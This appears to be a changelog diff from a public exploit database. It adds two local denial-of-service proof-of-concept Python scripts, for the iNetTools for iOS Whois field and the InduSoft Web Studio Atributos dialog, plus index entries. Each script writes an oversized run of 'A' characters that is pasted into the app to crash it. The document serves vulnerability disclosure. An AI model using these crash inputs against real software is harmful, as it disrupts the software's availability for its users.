DB: 2019-11-27

2 changes to exploits/shellcodes

iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)

exploits/ios/dos/47716.py

@@ -0,0 +1,25 @@
+# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019-11-25
+# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
+# Software Link: App Store for iOS devices
+# Tested Version: 8.20
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.2
+
+# Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as 
+# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.
+# Steps to Produce the Crash:
+
+# 1.- Run python code: iNetTools.py
+# 2.- Copy content to clipboard
+# 3.- Open "iNetTools for iOS"
+# 4.- Go to "Whois"
+# 5.- Paste ClipBoard on "Domain Name"
+# 6.- Start
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 98
+print (buffer)

exploits/windows/dos/47717.py

@@ -0,0 +1,33 @@
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2019-11-23
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link : http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Google Dork: chuyrojas1997@gmail.com: chuyreds
+# Discovery Date: 23-11-2019
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link : http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Denial of Service: 
+# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
+# 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
+# 3.- Open InduSoft Web Studio Edition 8.1 SP1
+# 4.- On Graficos slect Atributos
+# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
+
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1026
+f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
+f.write(buffer)
+f.close()

files_exploits.csv

@@ -6607,6 +6607,8 @@ id,file,description,date,author,type,platform,port
 47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows,
 47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows,
 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
+47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios,
+47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,